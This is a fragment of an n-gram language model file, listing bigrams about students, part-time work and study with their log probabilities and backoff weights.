-1.0748656 matter of -0.048957378
-0.2651781 lack of -0.048957378
-1.088652 process of -0.048957378
-1.1718221 practice of -0.048957378
-1.4730846 always of -0.048957378
-1.1718221 short of -0.048957378
-1.3403366 problem of -0.048957378
-1.3082997 effect of -0.048957378
-1.5226111 workplace of -0.048957378
-0.34167972 instead of -0.048957378
-1.1718221 concern of -0.048957378
-0.6597778 bit of -0.048957378
-0.6597778 confines of -0.048957378
-1.0748656 rest of -0.30637136
-1.4718409 lives of -0.048957378
-1.0748656 sample of -0.048957378
-0.6597778 delights of -0.048957378
-0.9286844 round of -0.048957378
-1.4316496 Students of -0.048957378
-1.2424442 rent of -0.048957378
-1.4450088 freedom of -0.048957378
-0.40596336 purpose of -0.11268411
-0.90030324 waste of -0.048957378
-0.9286844 circle of -0.048957378
-1.5510006 hours of -0.048957378
-1.4410069 week of -0.048957378
-1.5547959 day of -0.048957378
-0.5626168 risk of -0.04895735
-0.9286844 frustration of -0.048957378
-1.088652 First of -0.048957378
-1.1608341 responsibility of -0.04895735
-0.3955036 list of -0.048957378
-0.6597778 satisfaction of -0.048957378
-1.2424442 University of -0.048957378
-1.3969378 point of -0.048957378
-0.6597778 backdrop of -0.048957378
-0.6597778 lots of -0.048957378
-0.9286844 applications of -0.048957378
-0.9286844 background of -0.048957378
-0.17096433 members of -0.048957378
-1.1847353 expectations of -0.048957378
-0.6597778 rules of -0.048957378
-0.6597778 array of -0.048957378
-1.1847353 possibilities of -0.048957378
-0.17096433 kind of -0.048957378
-0.6597778 dynamics of -0.048957378
-0.9286844 side of -0.048957378
-1.0748656 manager of -0.048957378
-0.3955036 loss of -0.048957378
-0.6597778 danger of -0.048957378
-1.0748656 causes of -0.048957378
-0.6597778 love of -0.048957378
-0.6597778 destiny of -0.048957378
-0.9286844 institutions of -0.048957378
-1.536486 right of -0.048957378
-0.5626168 youth of -0.187397
-0.9286844 virtues of -0.048957378
-0.6597778 abuse of -0.048957378
-0.6597778 negligence of -0.048957378
-0.9286844 purposes of -0.048957378
-0.3955036 sight of -0.187397
-0.6597778 corners of -0.048957378
-1.4316496 balance of -0.048957378
-0.9286844 decision of -0.048957378
-0.6597778 attainment of -0.048957378
-0.9286844 mainly of -0.048957378
-0.9286844 challenges of -0.048957378
-0.6597778 favor of -0.048957378
-0.3955036 variety of -0.048957378
-0.2651781 form of -0.048957378
-0.6597778 capable of -0.048957378
-0.3955036 appreciation of -0.187397
-0.6597778 length of -0.048957378
-0.9286844 path of -0.048957378
-0.6597778 content of -0.048957378
-1.0748656 expense of -0.048957378
-0.9286844 pressure of -0.048957378
-0.6597778 percentage of -0.048957378
-0.6597778 notice of -0.048957378
-1.2424442 goal of -0.048957378
-0.3955036 care of -0.04895735
-0.17096433 number of -0.13618872
-0.6597778 dime of -0.048957378
-0.6597778 requirements of -0.048957378
-0.6597778 failures of -0.048957378
-0.6597778 undecided of -0.048957378
-0.6597778 direction of -0.187397
-1.0748656 kids of -0.048957378
-0.6597778 possession of -0.048957378
-0.3955036 thousands of -0.048957378
-0.6597778 atmosphere of -0.048957378
-0.6597778 norms of -0.048957378
-0.6597778 periods of -0.048957378
-0.6597778 bouts of -0.048957378
-0.6597778 One of -0.048957378
-0.67875934 efforts of -0.048957378
-0.6597778 control of -0.048957378
-0.6597778 security of -0.048957378
-0.3955036 thoughts of -0.048957378
-0.6597778 joys of -0.048957378
-0.6597778 pain of -0.048957378
-0.6597778 interpretation of -0.048957378
-0.6597778 walks of -0.048957378
-0.6597778 myriad of -0.048957378
-0.3955036 amounts of -0.048957378
-0.6597778 terms of -0.04895735
-0.9286844 beginning of -0.048957378
-0.6597778 impression of -0.048957378
-0.6597778 sort of -0.048957378
-0.6597778 detriment of -0.048957378
-1.2225406 health of -0.12260215
-0.6597778 phase of -0.048957378
-0.67875934 ideas of -0.187397
-0.6597778 remainder of -0.048957378
-0.3955036 pursuit of -0.048957378
-0.6597778 forms of -0.048957378
-0.6597778 dropout of -0.048957378
-0.6597778 image of -0.048957378
-0.6597778 acquisition of -0.048957378
-0.6597778 dollops of -0.048957378
-0.9286844 minimum of -0.048957378
-0.6597778 perversion of -0.048957378
-0.9286844 attention of -0.048957378
-0.6597778 behalf of -0.048957378
-0.9286844 none of -0.048957378
-0.6597778 foremost of -0.048957378
-0.6597778 efficacy of -0.048957378
-0.6597778 plenty of -0.187397
-0.6597778 entrance of -0.048957378
-0.6597778 feelings of -0.048957378
-0.9286844 regardless of -0.048957378
-0.6597778 concerns of -0.048957378
-0.6597778 sufferers of -0.048957378
-0.17096433 effects of -0.048957378
-0.6597778 hundreds of -0.048957378
-0.9286844 interference of -0.048957378
-0.6597778 parts of -0.048957378
-0.6597778 despite of -0.048957378
-0.6597778 infringement of -0.048957378
-0.6597778 smell of -0.048957378
-0.9286844 comfort of -0.048957378
-3.2085369 a nature -0.048957378
-2.4029973 by nature -0.048957378
-2.1553595 very nature -0.048957378
-2.3543274 The nature -0.048957378
-1.5924584 true nature -0.048957378
-2.6986191 I completely -0.048957378
-3.0414262 is completely -0.048957378
-3.0569165 in completely -0.048957378
-3.1451926 and completely -0.048957378
-1.5341265 am completely -0.048957378
-1.8600588 without completely -0.048957378
-2.7652595 job unrelated -0.048957378
-1.4704666 completely unrelated -0.048957378
-2.46057 an unrelated -0.048957378
-1.0508462 reasons to -0.048957378
-1.5903312 it to -0.04895735
-1.6811284 be to -0.04895735
-0.72180253 having to -0.07333779
-1.5751932 job to -0.04895735
-1.4192693 is to -0.04895735
-1.576197 valuable to -0.048957378
-1.2686075 student to -0.08422062
-1.4929917 graduation to -0.048957378
-1.7255036 , to -0.07613316
-1.2801445 not to -0.09038658
-1.2849426 case to -0.048957378
-1.9902425 in to -0.048957378
-1.4991642 and to -0.106249355
-0.5586906 unrelated to -0.048957378
-1.3251743 chosen to -0.048957378
-0.8811456 has to -0.048957378
-1.3806895 experience to -0.048957378
-1.6520369 working to -0.048957378
-1.7400358 as to -0.048957378
-1.601229 reason to -0.187397
-1.062123 students to -0.32777715
-1.6869233 also to -0.048957378
-1.5055274 less to -0.048957378
-1.0517309 time to -0.09295115
-0.55355364 available to -0.048957378
-1.4094291 jobs to -0.13618872
-1.7271516 one to -0.048957378
-0.17017452 unable to -0.048957378
-1.6199232 work to -0.11268411
-0.1524975 related to -0.32291976
-1.3972498 -RRB- to -0.048957378
-1.1961598 only to -0.048957378
-1.1461537 necessary to -0.04895735
-0.93347734 have to -0.086061224
-0.99103224 money to -0.0796529
-1.1532133 - to -0.048957378
-0.53202194 begin to -0.04895735
-1.3809829 or to -0.048957378
-1.6156511 well to -0.048957378
-0.91795576 appear to -0.048957378
-1.7760067 are to -0.048957378
-1.1532133 ways to -0.048957378
-0.93576556 benefits to -0.13618872
-2.0149956 part to -0.048957378
-0.39307514 order to -0.09038658
-1.5376222 ; to -0.048957378
-1.6797292 more to -0.048957378
-0.65396875 attractive to -0.048957378
-0.94012946 helps to -0.048957378
-1.7944751 skills to -0.048957378
-0.8313116 important to -0.071063936
-0.06756879 able to -0.07613316
-1.2373985 themselves to -0.048957378
-1.576392 first to -0.048957378
-0.82628065 enough to -0.099168696
-1.4634788 food to -0.048957378
-1.0599167 Having to -0.048957378
-0.5494863 need to -0.07333779
-1.4076629 others to -0.048957378
-1.5021309 like to -0.048957378
-1.3508242 parents to -0.048957378
-1.7317443 people to -0.048957378
-1.3131771 see to -0.048957378
-1.2721952 effort to -0.048957378
-0.91795576 keeping to -0.048957378
-0.39307514 willing to -0.048957378
-0.39307514 trying to -0.048957378
-0.53202194 chance to -0.11310794
-1.0187466 use to -0.048957378
-1.6991231 what to -0.048957378
-1.74052 all to -0.048957378
-0.5566332 opportunity to -0.08422062
-0.7894608 them to -0.048957378
-1.502666 Japanese to -0.048957378
-0.9820392 useful to -0.187397
-0.24584402 expected to -0.048957378
-1.0599167 Learning to -0.048957378
-0.65396875 external to -0.048957378
-1.4645659 get to -0.048957378
-1.0599167 relevant to -0.048957378
-1.2721952 colleges to -0.048957378
-1.5850388 activities to -0.048957378
-0.91795576 sufficient to -0.048957378
-0.35869056 how to -0.067588836
-1.1532133 lot to -0.048957378
-1.798391 life to -0.048957378
-0.5586906 prior to -0.048957378
-1.5777478 university to -0.048957378
-0.53202194 used to -0.04895735
-1.122083 up to -0.04895735
-0.3203675 difficult to -0.048957378
-1.5698397 make to -0.048957378
-0.6734003 regard to -0.048957378
-1.2849426 loans to -0.048957378
-1.4833115 income to -0.048957378
-1.706743 which to -0.048957378
-1.1542845 way to -0.048957378
-0.34143603 lead to -0.09435647
-0.65396875 regards to -0.048957378
-1.2721952 factor to -0.048957378
-0.76031667 ability to -0.048957378
-1.5089169 customers to -0.048957378
-1.3396053 sense to -0.048957378
-0.91795576 businesses to -0.048957378
-0.65396875 contrast to -0.048957378
-1.7588028 education to -0.048957378
-1.6350622 world to -0.048957378
-0.18565236 going to -0.12260215
-0.91795576 ground to -0.048957378
-1.2721952 entirely to -0.048957378
-1.0599167 '' to -0.048957378
-0.93576556 place to -0.048957378
-1.3375124 importance to -0.048957378
-1.6405561 out to -0.048957378
-1.6179485 where to -0.048957378
-1.3918962 value to -0.048957378
-1.3094288 transition to -0.048957378
-1.234228 campus to -0.048957378
-0.79111594 learning to -0.099168696
-0.91795576 continue to -0.048957378
-1.2206305 interests to -0.048957378
-0.91795576 translate to -0.048957378
-0.91795576 answer to -0.048957378
-0.91795576 question to -0.048957378
-1.1677823 limited to -0.048957378
-0.65396875 pertaining to -0.048957378
-0.65396875 relation to -0.048957378
-0.39307514 relative to -0.187397
-0.6781727 addition to -0.187397
-0.91795576 stand to -0.048957378
-0.6734003 decide to -0.048957378
-0.54948056 start to -0.048957378
-0.8109887 learn to -0.048957378
-0.8960868 lessons to -0.048957378
-1.0599167 areas to -0.048957378
-1.0599167 contacts to -0.048957378
-0.65396875 intends to -0.048957378
-1.5570242 than to -0.048957378
-0.9777668 just to -0.048957378
-0.6959686 possible to -0.27955192
-1.5624459 years to -0.048957378
-1.0599167 lesson to -0.048957378
-0.5963944 come to -0.04895735
-1.2206305 manage to -0.048957378
-0.59412885 means to -0.048957378
-1.5980755 much to -0.048957378
-0.6240338 go to -0.25144583
-0.6981963 needs to -0.20946135
-0.8871219 afford to -0.048957378
-0.65396875 daughter to -0.048957378
-0.91795576 herself to -0.048957378
-1.167622 getting to -0.048957378
-0.770318 hard to -0.048957378
-0.76031667 back to -0.048957378
-0.91795576 power to -0.048957378
-0.65396875 dedicated to -0.048957378
-1.1532133 government to -0.048957378
-0.91795576 comparison to -0.048957378
-1.3094288 adults to -0.048957378
-0.39307514 tend to -0.048957378
-0.76031667 likely to -0.13618872
-1.3746307 families to -0.048957378
-0.42979532 want to -0.17298892
-0.6734003 try to -0.048957378
-0.65396875 unavailable to -0.048957378
-1.2849426 takes to -0.048957378
-1.1532133 harder to -0.048957378
-0.9900141 freedom to -0.048957378
-1.1532133 serve to -0.048957378
-0.65396875 encouraged to -0.048957378
-1.0599167 fortunate to -0.048957378
-1.1677823 wisely to -0.048957378
-1.4085699 week to -0.048957378
-0.91795576 ready to -0.048957378
-0.65396875 bound to -0.048957378
-0.65396875 tempting to -0.048957378
-0.65396875 urged to -0.048957378
-0.65396875 child to -0.048957378
-1.5307803 home to -0.048957378
-1.1462728 responsibility to -0.048957378
-0.91795576 seem to -0.048957378
-1.4384576 person to -0.048957378
-1.0756072 adding to -0.048957378
-1.3466693 companies to -0.048957378
-0.91795576 easy to -0.048957378
-0.91795576 wisdom to -0.048957378
-0.65396875 network to -0.048957378
-0.65396875 needing to -0.048957378
-0.91795576 references to -0.048957378
-1.4458827 individual to -0.048957378
-0.91795576 wants to -0.048957378
-0.65396875 attentive to -0.048957378
-1.1677823 resources to -0.048957378
-1.1532133 h to -0.048957378
-1.1532133 needed to -0.048957378
-0.65396875 plan to -0.048957378
-1.1532133 further to -0.048957378
-0.65396875 stability to -0.048957378
-1.3131771 her to -0.048957378
-0.3657754 allowed to -0.048957378
-0.8648125 right to -0.04895735
-0.65396875 obliged to -0.048957378
-0.65396875 assigned to -0.048957378
-1.1677823 respect to -0.048957378
-0.65396875 measures to -0.048957378
-0.91795576 decision to -0.048957378
-0.65396875 consequences to -0.048957378
-0.65396875 closer to -0.048957378
-0.65396875 compared to -0.048957378
-0.65396875 credits to -0.048957378
-1.3375124 children to -0.048957378
-0.59412885 choose to -0.04895735
-0.58597535 had to -0.048957378
-0.76497996 required to -0.048957378
-0.65396875 surprised to -0.048957378
-0.65396875 came to -0.048957378
-0.91795576 bring to -0.048957378
-1.1532133 purely to -0.048957378
-1.1532133 given to -0.048957378
-0.65396875 relates to -0.048957378
-0.65396875 suited to -0.048957378
-1.234228 look to -0.048957378
-1.2206305 choice to -0.048957378
-0.65396875 assistant to -0.048957378
-0.65396875 leads to -0.048957378
-0.91795576 merit to -0.048957378
-0.65396875 capital to -0.048957378
-0.9777668 me to -0.048957378
-0.65396875 task to -0.048957378
-0.65396875 Looking to -0.048957378
-0.91795576 goes to -0.048957378
-0.65396875 adjusting to -0.048957378
-1.2206305 employees to -0.048957378
-0.65396875 adjust to -0.048957378
-0.91795576 utmost to -0.048957378
-0.65396875 prove to -0.048957378
-1.0599167 left to -0.048957378
-1.0599167 finished to -0.048957378
-0.91795576 ourselves to -0.048957378
-1.0599167 kids to -0.048957378
-0.3657754 wish to -0.099168696
-0.65396875 key to -0.048957378
-0.65396875 leading to -0.048957378
-0.65396875 accustomed to -0.048957378
-0.65396875 shock to -0.048957378
-0.65396875 deleterious to -0.048957378
-0.65396875 devotion to -0.048957378
-0.65396875 disciplines to -0.048957378
-0.65396875 dependence to -0.048957378
-0.5586906 begins to -0.04895735
-0.65396875 whom to -0.048957378
-0.91795576 women to -0.048957378
-0.91795576 applied to -0.048957378
-0.91795576 comes to -0.048957378
-0.91795576 nothing to -0.048957378
-0.65396875 traveling to -0.048957378
-0.17017452 due to -0.048957378
-0.65396875 shown to -0.048957378
-0.65396875 similarities to -0.048957378
-0.65396875 apt to -0.048957378
-0.65396875 supplementary to -0.048957378
-0.65396875 hopes to -0.048957378
-0.39307514 impossible to -0.048957378
-0.65396875 applies to -0.048957378
-0.65396875 introduced to -0.048957378
-0.91795576 offered to -0.048957378
-0.24584402 exposed to -0.04895735
-1.0599167 40 to -0.048957378
-0.65396875 thrown to -0.048957378
-0.91795576 distracting to -0.048957378
-0.65396875 decides to -0.048957378
-0.65396875 conducive to -0.048957378
-1.0756072 down to -0.048957378
-0.65396875 attracted to -0.048957378
-0.65396875 continues to -0.048957378
-0.65396875 access to -0.048957378
-1.5600798 restaurants to -0.048957378
-1.0599167 man to -0.048957378
-0.91795576 attention to -0.048957378
-0.65396875 asked to -0.048957378
-0.65396875 pertain to -0.048957378
-0.65396875 admitted to -0.048957378
-0.65396875 commuting to -0.048957378
-0.39307514 opposed to -0.048957378
-0.65396875 safe-guarded to -0.048957378
-0.65396875 hurry to -0.048957378
-0.65396875 Peter to -0.048957378
-1.1532133 approach to -0.048957378
-0.91795576 aside to -0.048957378
-0.65396875 advisable to -0.048957378
-1.1532133 rights to -0.048957378
-0.65396875 compelled to -0.048957378
-0.65396875 harm to -0.048957378
-0.91795576 justification to -0.048957378
-0.65396875 campaigns to -0.048957378
-0.65396875 prone to -0.048957378
-0.39307514 exposure to -0.048957378
-0.65396875 close to -0.048957378
-0.65396875 violently to -0.048957378
-0.65396875 insult to -0.048957378
-0.39307514 forced to -0.04895735
-1.0424002 with their -0.04895735
-1.3507061 for their -0.071063936
-2.3389277 that their -0.048957378
-2.1684217 is their -0.048957378
-2.285103 , their -0.04895735
-1.0393417 by their -0.09038658
-1.0680778 in their -0.11297751
-1.813698 and their -0.09038658
-1.2063874 of their -0.19241637
-1.52725 to their -0.11297751
-1.9649653 studying their -0.048957378
-1.0653949 from their -0.0796529
-2.2431486 as their -0.048957378
-2.3952057 students their -0.048957378
-0.84646785 on their -0.38513482
-2.0188966 also their -0.048957378
-2.2643657 work their -0.048957378
-2.0516112 if their -0.048957378
-1.3922343 pursuing their -0.048957378
-1.730854 pay their -0.048957378
-1.7700547 have their -0.04895735
-0.6799947 select their -0.048957378
-1.7998925 through their -0.048957378
-1.8990313 into their -0.048957378
-1.4551702 spend their -0.048957378
-1.4933755 put their -0.048957378
-1.6634643 when their -0.048957378
-2.0565314 do their -0.048957378
-1.578171 use their -0.13618872
-1.6084471 know their -0.048957378
-1.9900225 what their -0.048957378
-1.9810973 after their -0.048957378
-1.3254592 encourage their -0.048957378
-1.2977935 all their -0.048957378
-1.8350288 If their -0.048957378
-1.6030769 get their -0.048957378
-1.8157326 how their -0.048957378
-1.5090977 entering their -0.048957378
-0.6799947 neglecting their -0.048957378
-1.8217303 make their -0.048957378
-0.4696877 managing their -0.11268411
-0.83904034 during their -0.11268411
-1.5043861 earning their -0.048957378
-1.6353966 enjoy their -0.048957378
-1.2413204 balancing their -0.048957378
-1.3254592 improve their -0.048957378
-1.8789842 out their -0.048957378
-1.806351 about their -0.048957378
-1.4471194 either their -0.048957378
-1.2861439 support their -0.048957378
-1.1295397 keep their -0.048957378
-1.1295397 building their -0.048957378
-0.6799947 divide their -0.048957378
-0.9311309 let their -0.048957378
-1.4471194 quit their -0.048957378
-0.96701777 sacrifice their -0.048957378
-1.6240298 before their -0.048957378
-1.4988459 enter their -0.048957378
-0.96701777 hinder their -0.048957378
-1.4471194 until their -0.048957378
-0.6799947 maintaining their -0.048957378
-1.7203138 getting their -0.048957378
-0.9311309 change their -0.048957378
-0.6799947 furthering their -0.048957378
-1.4988459 between their -0.048957378
-0.6799947 dip their -0.048957378
-1.4632802 appreciate their -0.048957378
-0.9311309 waste their -0.187397
-1.408859 reduce their -0.048957378
-1.1295397 reach their -0.048957378
-1.1295397 sure their -0.048957378
-1.2413204 build their -0.048957378
-0.96701777 securing their -0.048957378
-1.1295397 ask their -0.048957378
-1.1295397 planning their -0.048957378
-0.96701777 damage their -0.048957378
-0.6799947 augment their -0.048957378
-0.96701777 finish their -0.048957378
-1.4471194 lose their -0.048957378
-1.5677247 balance their -0.048957378
-1.4038733 assist their -0.048957378
-0.9838272 complete their -0.048957378
-0.9838272 develop their -0.187397
-1.2413204 pass their -0.048957378
-1.2413204 towards their -0.048957378
-1.1295397 receive their -0.048957378
-0.6799947 raise their -0.048957378
-1.2413204 given their -0.048957378
-1.2413204 using their -0.048957378
-1.3314085 within their -0.048957378
-0.6799947 mortgaging their -0.048957378
-0.6799947 shops their -0.048957378
-1.1295397 leaving their -0.048957378
-0.6799947 assessing their -0.048957378
-0.6799947 spread their -0.048957378
-1.2413204 finally their -0.048957378
-0.6799947 Throughout their -0.048957378
-0.6799947 relieve their -0.048957378
-0.6799947 funding their -0.048957378
-0.96701777 beginning their -0.048957378
-0.6799947 sharpen their -0.048957378
-0.6799947 shape their -0.048957378
-1.1295397 nonetheless their -0.048957378
-0.6799947 compromise their -0.048957378
-0.6799947 regarding their -0.048957378
-3.3624787 the chosen -0.048957378
-1.9252394 their chosen -0.048957378
-2.7835681 have chosen -0.048957378
-2.5221097 the course -0.04895735
-2.047408 of course -0.14912641
-1.5326759 chosen course -0.048957378
-1.4667772 whether course -0.048957378
-0.9933765 Of course -0.04895735
-0.6934062 core course -0.048957378
-0.9933765 setting course -0.048957378
-0.9933765 heavy course -0.048957378
-2.7422526 for study -0.048957378
-2.8282797 a study -0.048957378
-1.6573156 full-time study -0.048957378
-2.980812 , study -0.048957378
-2.525486 not study -0.048957378
-2.51364 and study -0.048957378
-1.8411663 of study -0.2739523
-1.7749742 to study -0.15352628
-2.0656435 their study -0.04895735
-2.7444193 students study -0.048957378
-1.8437781 less study -0.048957378
-1.670574 available study -0.048957378
-2.143244 only study -0.048957378
-2.0623705 or study -0.048957378
-1.8682971 academic study -0.048957378
-2.007869 good study -0.048957378
-1.9528555 doing study -0.048957378
-2.331387 them study -0.048957378
-1.9919091 must study -0.048957378
-1.1618836 beyond study -0.048957378
-2.2708902 my study -0.048957378
-1.884701 hard study -0.048957378
-1.7992023 day study -0.048957378
-1.5132296 All study -0.048957378
-0.98780924 effective study -0.048957378
-0.98780924 reduces study -0.048957378
-0.69060683 uninteresting study -0.048957378
-0.98780924 depth study -0.048957378
-1.5273188 <s> For -0.33716017
-3.0382125 for example -0.048957378
-1.7707571 For example -0.75667316
-2.5749965 with studying -0.048957378
-2.8046703 for studying -0.187397
-2.4597433 is studying -0.187397
-2.5009751 student studying -0.048957378
-2.78825 , studying -0.048957378
-2.328257 by studying -0.048957378
-2.869348 in studying -0.048957378
-2.5660546 and studying -0.048957378
-2.589116 of studying -0.048957378
-2.1177297 on studying -0.04895735
-1.8882614 time studying -0.04895735
-2.252633 are studying -0.048957378
-2.0566664 spend studying -0.048957378
-1.4786097 while studying -0.13618872
-2.0345504 because studying -0.048957378
-1.1424879 were studying -0.048957378
-1.5750064 someone studying -0.048957378
-1.8892066 those studying -0.048957378
-1.9090905 years studying -0.048957378
-1.6259912 spent studying -0.048957378
-1.1629949 finished studying -0.048957378
-3.2102208 and engineering -0.048957378
-2.201754 studying engineering -0.048957378
-2.453272 an engineering -0.048957378
-0.69396824 mechanical engineering -0.048957378
-2.5802724 it has -0.048957378
-2.0747159 that has -0.04895735
-2.570245 job has -0.048957378
-2.475432 student has -0.048957378
-2.759342 , has -0.04895735
-2.7795007 and has -0.048957378
-1.2829179 engineering has -0.048957378
-1.9277668 reason has -0.048957378
-1.6864614 one has -0.048957378
-2.6094086 work has -0.048957378
-1.161342 market has -0.048957378
-1.6849463 who has -0.048957378
-2.141174 which has -0.048957378
-2.1820824 education has -0.048957378
-2.0815635 world has -0.048957378
-1.5707507 someone has -0.048957378
-1.7713375 workplace has -0.048957378
-1.7355181 individual has -0.048957378
-1.7397609 he has -0.048957378
-0.98863983 teacher has -0.048957378
-0.98863983 Poker has -0.048957378
-1.161342 poker has -0.048957378
-0.69102556 trend has -0.048957378
-1.9980528 smoke has -0.048957378
-0.69102556 air has -0.048957378
-1.9470313 be very -0.04895735
-2.615849 a very -0.04895735
-1.8774816 is very -0.19131482
-2.6890378 the very -0.048957378
-2.5951056 not very -0.048957378
-3.0465307 to very -0.048957378
-2.1352682 has very -0.048957378
-2.650844 work very -0.048957378
-2.4735553 should very -0.048957378
-2.6454384 college very -0.048957378
-2.034786 become very -0.048957378
-0.9903057 pays very -0.048957378
-1.7829504 are very -0.11268411
-2.2979062 fs very -0.048957378
-1.7080401 still very -0.048957378
-1.6702625 worked very -0.048957378
-1.833048 was very -0.048957378
-1.2862043 its very -0.048957378
-0.6918643 weighed very -0.048957378
-1.817344 with little -0.04895735
-2.095488 having little -0.048957378
-1.9739912 a little -0.12183642
-3.126527 of little -0.048957378
-1.5786462 very little -0.048957378
-2.686682 as little -0.048957378
-2.2040818 have little -0.187397
-2.2654846 what little -0.048957378
-2.3150349 that experience -0.048957378
-2.4861102 job experience -0.048957378
-0.92697257 valuable experience -0.11268411
-2.2293139 the experience -0.099168696
-2.4641187 will experience -0.048957378
-1.2758812 acquire experience -0.048957378
-2.4482787 and experience -0.048957378
-2.7416196 of experience -0.048957378
-2.284967 to experience -0.048957378
-2.4964895 as experience -0.048957378
-2.6798315 students experience -0.048957378
-1.5572013 Such experience -0.048957378
-2.5046253 on experience -0.048957378
-2.2338045 also experience -0.048957378
-1.2813437 work experience -0.14843592
-2.2583182 an experience -0.048957378
-2.2564173 may experience -0.048957378
-2.1128004 college experience -0.048957378
-2.5140097 have experience -0.048957378
-2.156075 some experience -0.048957378
-1.9588021 first experience -0.048957378
-2.0042908 This experience -0.048957378
-2.2932804 them experience -0.048957378
-1.0519074 useful experience -0.048957378
-1.156013 relevant experience -0.048957378
-1.4811971 life experience -0.13618872
-0.9850521 providing experience -0.048957378
-0.7058281 actual experience -0.048957378
-2.002377 learning experience -0.048957378
-2.2295964 my experience -0.048957378
-0.68921393 hands-on experience -0.048957378
-1.5636735 hand experience -0.048957378
-0.9850521 direct experience -0.048957378
-0.68921393 worthwhile experience -0.048957378
-1.3677793 invaluable experience -0.048957378
-0.68921393 real-world experience -0.048957378
-0.68921393 Work experience -0.048957378
-0.68921393 flipping experience -0.048957378
-2.1210215 can gain -0.048957378
-2.7056403 and gain -0.04895735
-2.2480474 to gain -0.09038658
-2.933356 students gain -0.048957378
-2.392312 also gain -0.048957378
-2.0019288 financial gain -0.048957378
-2.2952857 student from -0.048957378
-2.4617667 and from -0.048957378
-1.1984419 gain from -0.048957378
-2.2938082 working from -0.048957378
-2.5599706 students from -0.048957378
-2.1040056 time from -0.048957378
-1.9959579 but from -0.048957378
-2.04196 only from -0.048957378
-1.892135 money from -0.048957378
-1.0453532 benefit from -0.048957378
-0.686027 Apart from -0.048957378
-1.1467421 gained from -0.048957378
-1.7113171 friends from -0.048957378
-1.8060203 people from -0.048957378
-0.4062422 borrowed from -0.048957378
-2.2165635 them from -0.048957378
-1.5849212 useful from -0.048957378
-1.1467421 Learning from -0.048957378
-1.6411357 get from -0.048957378
-0.17476808 away from -0.08422062
-1.2637045 lot from -0.048957378
-1.5376908 graduate from -0.048957378
-0.686027 acquired from -0.048957378
-0.5505629 transition from -0.13618872
-1.4665623 learning from -0.048957378
-0.87467194 different from -0.048957378
-1.8146441 support from -0.048957378
-1.4278648 free from -0.048957378
-1.8271488 those from -0.048957378
-1.4973841 come from -0.048957378
-0.686027 exclusively from -0.048957378
-0.686027 scholarships from -0.048957378
-0.97877645 adapt from -0.048957378
-0.686027 leap from -0.048957378
-1.5780652 fully from -0.048957378
-0.4062422 escape from -0.048957378
-0.686027 Wages from -0.048957378
-1.8989673 things from -0.048957378
-0.97877645 suffering from -0.048957378
-0.4062422 refrain from -0.048957378
-1.7127738 home from -0.048957378
-0.686027 ranging from -0.048957378
-1.5814797 independence from -0.048957378
-0.97877645 view from -0.048957378
-0.686027 hide from -0.048957378
-0.97877645 break from -0.048957378
-0.97877645 direct from -0.048957378
-1.4937676 save from -0.048957378
-0.97877645 cities from -0.048957378
-0.97877645 profit from -0.048957378
-0.9394727 banned from -0.048957378
-1.1467421 graduating from -0.048957378
-0.686027 Incomes from -0.048957378
-0.686027 comprehend from -0.048957378
-0.686027 vary from -0.048957378
-0.686027 contact from -0.048957378
-0.686027 lacking from -0.048957378
-0.686027 evolved from -0.048957378
-0.97877645 distract from -0.048957378
-0.686027 fatigued from -0.048957378
-0.686027 occur from -0.048957378
-2.4315228 with working -0.048957378
-2.3118384 for working -0.048957378
-1.271607 While working -0.048957378
-1.8638816 that working -0.048957378
-2.494195 the working -0.048957378
-1.9875681 , working -0.11268411
-2.4128027 not working -0.048957378
-1.4808807 by working -0.04895735
-2.092994 and working -0.048957378
-2.253649 of working -0.04895735
-2.531885 their working -0.187397
-1.7936449 course working -0.048957378
-1.8134881 experience working -0.048957378
-1.2292035 from working -0.09038658
-2.4572465 as working -0.048957378
-2.2848065 students working -0.04895735
-1.6749804 time working -0.11268411
-2.085097 only working -0.048957378
-1.758991 And working -0.048957378
-1.499587 does working -0.048957378
-2.4525099 are working -0.048957378
-1.3625039 Part-time working -0.048957378
-0.9993211 By working -0.13618872
-2.2272341 skills working -0.048957378
-1.7907305 like working -0.048957378
-1.4665349 while working -0.048957378
-1.8933928 believe working -0.048957378
-2.1733258 fs working -0.048957378
-2.0172663 up working -0.048957378
-0.982859 continue working -0.048957378
-1.4968498 either working -0.048957378
-1.6478957 start working -0.048957378
-1.9337372 than working -0.048957378
-1.8603084 hard working -0.048957378
-1.7028046 always working -0.048957378
-1.634657 Students working -0.048957378
-1.6372883 week working -0.048957378
-1.5490685 both working -0.048957378
-1.5567847 hand working -0.048957378
-0.6881027 unhappiness working -0.048957378
-0.6881027 excessive working -0.048957378
-1.271607 ever working -0.048957378
-1.1527659 currently working -0.048957378
-0.6881027 tedious working -0.048957378
-0.6881027 anybody working -0.048957378
-0.982859 smoke-free working -0.048957378
-2.30506 part-time as -0.048957378
-2.0112605 job as -0.048957378
-2.4123163 is as -0.048957378
-2.22024 student as -0.048957378
-1.7778959 , as -0.20951243
-1.8620291 often as -0.048957378
-1.8715571 employment as -0.048957378
-2.3517635 and as -0.048957378
-1.3448838 nature as -0.048957378
-2.085475 study as -0.048957378
-1.7733369 experience as -0.048957378
-2.2311406 working as -0.048957378
-2.4772856 students as -0.048957378
-1.5151759 Such as -0.048957378
-2.0158684 studies as -0.048957378
-1.813319 jobs as -0.048957378
-1.7292166 focus as -0.048957378
-1.8940479 -LRB- as -0.048957378
-0.5155745 such as -0.048957378
-2.3186307 have as -0.048957378
-1.8687097 money as -0.048957378
-1.7052932 And as -0.048957378
-1.9511064 you as -0.048957378
-1.9315999 or as -0.048957378
-1.8688633 well as -0.0796529
-1.5196023 benefits as -0.048957378
-2.1360562 skills as -0.048957378
-2.145555 important as -0.048957378
-1.8195623 themselves as -0.048957378
-1.7270309 environment as -0.048957378
-1.5278686 position as -0.048957378
-1.5657564 financially as -0.048957378
-1.9315103 spend as -0.048957378
-1.3448838 times as -0.048957378
-1.6925508 friends as -0.048957378
-1.5151759 put as -0.048957378
-2.1341243 people as -0.048957378
-2.1593525 them as -0.048957378
-0.57832295 distractions as -0.048957378
-1.8704551 society as -0.048957378
-1.8640056 activities as -0.048957378
-1.8155737 university as -0.048957378
-1.5657564 finances as -0.048957378
-1.2533867 pressures as -0.048957378
-0.6832746 generated as -0.048957378
-1.7913175 living as -0.048957378
-1.1388383 almost as -0.048957378
-0.97339207 require as -0.048957378
-1.5570483 force as -0.048957378
-1.6022459 success as -0.048957378
-1.3401492 interests as -0.048957378
-2.0178359 learn as -0.048957378
-1.4796438 beneficial as -0.048957378
-1.5613806 just as -0.048957378
-1.4843063 come as -0.048957378
-1.9127479 much as -0.048957378
-1.3401492 system as -0.048957378
